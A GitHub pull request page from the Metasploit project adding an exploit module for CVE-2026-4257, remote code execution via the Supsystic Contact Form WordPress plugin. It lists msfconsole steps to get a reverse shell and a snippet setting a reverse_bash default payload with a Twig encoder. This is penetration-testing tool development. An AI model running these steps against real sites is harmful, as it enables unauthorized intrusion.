Skip to content

Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257#21267

Open
bootstrapbool wants to merge 7 commits intorapid7:masterfrom
bootstrapbool:supsystic_contact_form_cve_2026_4257
Open

Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257#21267
bootstrapbool wants to merge 7 commits intorapid7:masterfrom
bootstrapbool:supsystic_contact_form_cve_2026_4257

Conversation

@bootstrapbool
Copy link
Copy Markdown
Contributor

@bootstrapbool bootstrapbool commented Apr 10, 2026

This change adds a module to exploit CVE-2026-4257 resulting in remote code execution on Wordpress sites with the Contact Form by Supsystic plugin.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/wp_plugin_supsystic_contact_form_rce
  • set RHOSTS <target>
  • set TARGETURI <uri to page with contact form> (e.g., /wordpress/index.php/sample-page/)
  • set LHOST <your_ip>
  • exploit
  • On success a shell session will be started
  • If no FIELD argument is provided, one is automatically detected and used

*pcap sent to msfdev@metasploit.com

dwelch-r7
dwelch-r7 reviewed Apr 23, 2026
View reviewed changes
Comment thread modules/encoders/cmd/twig_base64.rb Outdated
Comment thread modules/encoders/cmd/twig_base64.rb Outdated
Comment thread modules/encoders/cmd/twig_base64.rb Outdated
Comment thread modules/exploits/multi/http/wp_plugin_supsystic_contact_form_rce.rb
'Payload' => {
'Encoder' => 'cmd/twig_base64'
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
Copy link
Copy Markdown
Contributor

@dwelch-r7 dwelch-r7 Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Did the module not work if you don't set a default payload?

Copy link
Copy Markdown
Contributor Author

@bootstrapbool bootstrapbool May 2, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, I was unable to get other payloads like meterpreter to work. I think because of bad characters?

Comment thread modules/exploits/multi/http/wp_plugin_supsystic_contact_form_rce.rb Outdated
@bootstrapbool bootstrapbool requested a review from dwelch-r7 May 2, 2026 20:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@dwelch-r7 dwelch-r7 Awaiting requested review from dwelch-r7

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@bootstrapbool @dwelch-r7 @smcintyre-r7